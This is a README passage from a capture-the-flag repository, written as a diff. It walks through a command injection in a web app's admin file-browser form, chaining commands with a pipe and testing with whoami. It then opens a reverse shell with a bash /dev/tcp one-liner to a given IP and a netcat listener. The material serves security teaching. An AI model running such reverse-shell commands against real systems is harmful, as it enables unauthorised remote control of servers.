Aledangelo/NetworkSecurity-CTF/README.md

 **Command Injection** is an attacck in wich the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
 These attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell.
 In this attack, the attacker-supplied operating system command are usually executed with the privileges of the vulnerable application.
 Command injection attacks are possible largely due to insufficient input validation.

+Having logged in with the admin credentials, you are redirected to the /admin page.
+You may notice a form that says "*Explore your File System*", using this feature the admin can navigate through the folders containing the source codes for the web application.
+It is possible to assume that the web application uses a function to launch commands that will be executed by the shell.
+The command being executed probably looks something like this:
+* **"ls -l " + input**

+The current goal is to find a way to execute malicious commands by taking advantage of possible poor input validation, to do this we can use the pipe command.

+### Pipe Command
+A pipe is an aspect of redirection i.e., transfer of any standard output to another target path which is commonly used in Unix and Linux-like operating systems in order to send the outputs of one process/command/program to another/program/command/process for any further processing.
+The Linux/Unix system enables stdout of a command to connect to stdin of other commands, which we can do by the pipe character ‘|.’

+### && Operator in Linux

+The Bash logical (&&) operator is one of the most useful commands that can be used in multiple ways, like you can use in the conditional statement or execute multiple commands simultaneously.
+Generally speaking, the logical operator is the one that is used to connect more than one expression and then provides the output based on their combined result.

+These are just some of the possible ways to chain multiple commands, you can do an initial test with the *whoami* command:
+* **ls -l | whoami**

+### Reverse Shell
+It is possible to have the server open a terminal to our attacking machine.
+To do this, you can open a shell to a remote address with a simple terminal command:
+* **bash -i >& /dev/tcp/IP_ADDRESS/PORT**

+You need to listen on the attacking machine in order to accept the server connection.
+We use the netcat tool to do this:
+* **nc -lnvp PORT** (you can choose any free port)

+Thanks to command injection, we can open a remote shell on our attacking machine by typing the command:
+* **bash -c "bash -i >& /dev/tcp/193.20.1.4/PORT 0>&1"**

+In this case, the server does not use the **/bin/bash** shell by default, so you need to invoke it with the -c flag to specify which command it should execute.
+If everything went well, the server will get stuck loading the page, and a remote shell will open on your terminal.
 ## Privilege Escalation

 ## Cracking Password